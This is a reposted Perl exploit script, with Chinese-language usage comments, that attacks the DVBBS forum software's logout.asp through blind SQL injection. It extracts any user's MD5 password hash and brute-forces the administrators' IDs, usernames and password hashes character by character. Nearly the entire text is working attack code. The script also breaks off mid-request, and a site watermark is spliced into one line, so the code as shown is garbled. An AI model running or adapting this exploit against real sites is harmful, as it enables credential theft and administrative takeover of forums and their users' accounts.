获取任意用户MD5加密信息的测试程序
来源:热点网络
--------------------[获取任意用户MD5加密信息的测试程序:
#!/usr/bin/perl
#Codz By PsKey<PsKey@hotmail.com>
#Exploit of DVBBSs logout.asp
#--------------------------------------------------------------------------
# 本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户
# MD5加密密码;另外可以自动破解后台管理员ID、username、password
# 脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序
# 脚本利用方法:
# 1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid
# 2:再另注册一任意用户(此步不可少)
# 3:运行脚本,按帮助输入命令参数
# 如果是MSSQL版,请把这段糟糕的脚本扔到一边
#--------------------------------------------------------------------------
$|=1;
use Socket;
use Getopt::Std;
getopt(hpwium);
print " =================================================== ";
print " Exploit of DVBBSs logout.asp ";
print " Codz By PsKey<PsKey@hotmail.com> ";
print " http://www.isgrey.com/ && c4st.51.net ";
print " Thanx Envymask<130@21cn.com> ";
print " =================================================== ";
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;
if ($opt_m eq "p") {
&usage unless defined($opt_u);
print " Please wait... ";
for ($j=1;$j<=16;$j++) {
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i++) {
print "$dic[$i]";
$key=$pws.$dic[$i];
$target = "ilikecat%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName=$user%20and%20left(UserPassword,$j)=$key)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$j.th;
print " //------------The $th word of the password is $dic[$i]";
$pws=$pws.$dic[$i];
last;
}
}
}
print " Successful,the full password of $user is $pws. ";
}
elsif ($opt_m eq "b") {
#Crack ID
print " ###########Start cracking admins id...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
print " --------->>There is one admins id $i";
push (@id,$i);
&first;
}
}
print " ###########End cracking admins id... ";
sleep(2);
#Crack the length of admins username
print " ###########Start Cracking the length of admins username... ";
for ($j=0;$j<@id;$j++) {
print " |->cracking usernames length which id is $id[$j] ...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
print " --------->>The length of $id[$j] is $i";
push (@len,$i);=版权所有 软件 下载 学院 版权所有=
&first;
last;
}
}
}
print " ###########End Cracking the length of admins username... ";
sleep(2);
#Crack admins username
print " ###########Start Crackadmins username... ";
@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " |->cracking username which id is $id[$j] ...";
OUTER: for ($k=1;$k<=$len[$j];$k++) {
&first;
USERNAME: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)=$key)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print " --------->>The $th word of $id[$j] username is $dic[$i]";
$pws=$pws.$dic[$i];
last USERNAME;
}
if ($dic[$i] eq "z") {
print " i cant crack this admins name,maybe it is chinese. ";
push (@user,"?");
last OUTER;
}
}
}
push (@user,$pws);
print " ========>>The username is $pws which id is $id[$j] ";
}
print " ###########End Crackadmins username... ";
sleep(2);
#Crack admins password
print " ###########Start Crackadmins password... ";
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " |->cracking password which id is $id[$j] ...";
for ($k=1;$k<=16;$k++) {
&first;
PASSWORD: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)=$key)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print " --------->>The $th word of $id[$j] password is $dic[$i]";
$pws=$pws.$dic[$i];
last PASSWORD;
}
}
}
push (@pass,$pws);
print " ========>>The password is $pws which id is $id[$j] ";
}
print "###########End Crackadmins password... ";
print "We got them now: ";
printf("%-4s %-20s %-16s ",ID,UserName,PassWord);
for ($i=0;$i<@id;$i++) {
printf("%-4d %-20s %-16s ",$id[$i],$user[$i],$pass[$i]);
}
}
else {
&usage;
}
sub first {
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1 ".
"Referer: http://$host$path/login.asp ".
"Host: $host ".
"Content-Length: $len ".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0;
补充:综合编程 , 安全编程 ,
